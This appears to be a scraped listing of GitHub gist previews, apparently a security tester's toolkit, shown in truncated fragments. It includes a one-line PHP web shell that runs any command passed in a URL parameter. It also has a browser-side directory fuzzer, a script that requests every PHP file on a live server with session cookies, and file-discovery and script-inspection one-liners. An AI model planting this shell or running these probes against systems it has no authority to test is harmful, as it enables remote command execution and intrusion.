This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
find / -type f -newermt 2019-07-07 ! -newermt 2019-07-31 -ls -readable 2> /dev/null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function fuzz(){ | |
// Replace with any online newline separated word list | |
var WORDLIST_URL = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt"; | |
var WORDLIST = []; | |
var xhttp = new XMLHttpRequest(); | |
// Fetch wordlist | |
xhttp.open("GET", WORDLIST_URL, false); | |
xhttp.onreadystatechange = function() { | |
if (this.readyState == 4 && this.status == 200) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, re, time | |
import pyperclip | |
texts = [] | |
while 1: | |
sys.stdout.flush() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# pip install jsbeautifier requests | |
import os | |
import requests | |
from jsbeautifier import beautify | |
try: | |
os.mkdir('js') | |
except OSError: | |
pass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for(i=0;i<document.scripts.length;i++)console.log(document.scripts[i].src) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
script=document.createElement('script');document.head.appendChild(script);script.src='https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
""" | |
Recursively traverse a php repo, | |
add a line that logs fn calls. | |
Non overlapping matches. | |
cd into project root. | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests, time, os | |
""" | |
List all .php files in repo, send GET and POST to live url, print response if it is not 404 | |
Start from repo root dir. | |
Args: base_url_to_live_server | |
""" | |
COOKIES = {'SESSID': '', 'PHPSESSID': ''} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os, re, sys | |
""" | |
Recursively traverse a php repo, add a line that logs fn calls. | |
Non overlapping matches! | |
Arg: output file full path | |
""" | |
OUTFILE = sys.argv[1] |
NewerOlder